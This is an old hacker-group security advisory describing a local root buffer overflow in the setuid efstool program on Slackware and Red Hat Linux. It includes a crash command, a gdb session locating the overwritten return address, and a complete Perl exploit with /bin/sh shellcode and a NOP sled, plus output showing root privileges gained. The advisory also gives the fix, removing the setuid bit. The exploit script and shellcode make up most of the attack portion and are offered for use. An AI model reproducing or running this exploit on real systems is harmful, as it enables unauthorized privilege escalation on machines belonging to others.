§+++++++++++++++++++++++++++++++++++++++++++++++§ ]|[ [-=- SOLDIERX.COM Presents -=-] ]|[ +++++++++++++++§+++_________________________________________+++§+++++++++++++++ \\//////////////// EFSTOOL LOCAL ROOT EXPLOIT \\\\\\\\\\\\\\\\// \\\\\\\\\\\\\\\\\______________SLACKWARELINUX_____________///////////////// \\:::::::::::::::::::::::::::::::: by :::::::::::::::::::::::::::::::::// \\xxxxxxxxxxxxxxxxxxxxxxxx§-=-][-NTFX-][-=-§xxxxxxxxxxxxxxxxxxxxxxxxx// \\:::::::::::::::::::::::::::::: of :::::::::::::::::::::::::::::::// \\ SOLDIERX.COM, LEGION2000 // \\ September, 2002 // \\ NOBODY CAN STOP INFORMATION INSEMINATION // §=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§ [ Author's E-mail - NTFX@SOLDIERX.COM ] ********************************************************************** | The author hereby grants permission to reproduce, redistribute, | | or include this file(s) in your file section, electronic or print | | newletter, or any other form of transmission that you choose, as | | long as it is kept intact and whole, with no ommissions, delet- | | ions, or changes. (C)2002 SOLDIERX.COM - http://www.soldierx.com | ********************************************************************** [L2K Advisory ef0001] Feb 13th 02 EFSTOOL LOCAL ROOT Author: ntfx Legion2000 Security Research (c) Soldierx Dot Com (c) Web: http://legion200.security.nu Web: http://soldierx.com Note: i have previously not written any advisories so be patient. What is Bonobo (contains the efstool package) Bonobo is a set of language and system independant CORBA interfaces for creating reusable components, controls and creating compound documents. The Bonobo distribution includes a Gtk+ based implementation of the Bonobo interfaces, enabling developers to create reusable components and applications that can be used to form more complex documents. There has been found a condition in efstool which is shipped with redhat linux / slackware linux and possibly others which given the right environment root privilages can be gained. Dependant on suid permissions. If a user prints 3000 "A" to the buffer this will seg fault the program as shown below. $ /usr/bin/efstool `perl -e 'print "A" x 3000'` Segmentation fault Now we proceed to open gdb on the item to view what may have occured. $gdb /usr/bin/efstool GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-slackware-linux"... (no debugging symbols found)... (gdb) r `perl -e 'print "A" x 3000'` Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'` (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info reg esp esp 0xbfffe890 0xbfffe890 (gdb) Here as you can see we are able to gain the return address. Return : 0xbfffe890 when we get to the return address it will return to the nops and continue down the code which will this execute a shell in our exploit. The offset has to be played with for the exploit to work effeciently but a offset of around -1000 / -2000 should work. I have done minimal testing on this, So if it doesnt work fully do not come crying to me. It has been tested on slackware 7.1 Solution to this : remove suid permissions on the program #chmod u-s efstool added: Do not confuse this with the other efstool release, Our version was semi released back in Feb 13th when the original discovery took place, I personally do not like using security focus for releases or have ever previously bothered with it. - ntfx 10.09 Included is the example exploit. --------------------------cut kitkat.pl--------------------------------- #!/usr/bin/perl # Efstool local root exploits (Slackware 8.1) # Author: ntfx Feb 13th 2002 # Legion2000 Security Research (c) # Soldierx Dot Com # WEB: HTTP://legion2000.security.nu # WEB: HTTP://soldierx.com # GREET: Legion2000SR, Soldierx.com, Kat ############################################ # Solution: chmod u-s efstool ############################################ if(! $ARGV[0]) { &usage; exit; } sub usage() { print "USAGE: perl $0 kat\n"; print "efstool local root by ntfx\n"; print "Legion2000SR http://legion2000.security.nu\n"; print "Soldierx http://soldierx.com\n"; exit(0); } $ret = "0xbfffe890"; $offset = $ARGV[0]; $nop = "\x90"; $ev1lc0de = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89". "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3". "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29". "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff". "/bin/sh"; if ($ARGV[1] eq "kat") { $len = 3000; for ($i = 0; $i < ($len - length($ev1lc0de)); $i++) { $buffer .= $nop; } $buffer .= $ev1lc0de; } $buffer .= pack('l', ($ret + $offset)); $buffer .= pack('l', ($ret + $offset)); # You will now be privilaged.. exec("/usr/bin/efstool $buffer"); sleep 2; system("id; uname -a"); # This has been a SoldierX/Legion2000 Production. --------------------------cut kitkat.pl--------------------------------- $ perl kitkat.pl kat uid=0(root) gid=100(users) groups=100(users) Linux efstool-exp 2.2.21 #1 Thu Jun 13 03:57:27 BST 2002 i586 unknown # As you can see root privilages have been gained and with the system exec it displays the proven root uid and uname of the system. ntfx _____________________________________________________________________ §=------------------------------]-§-[------------------------------=§ \\ THIS FILE WAS A SOLDIERX PRODUCTION // \\ http://www.soldierx.com // \\ NOBODY CAN STOP INFORMATION INSEMINATION // §=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§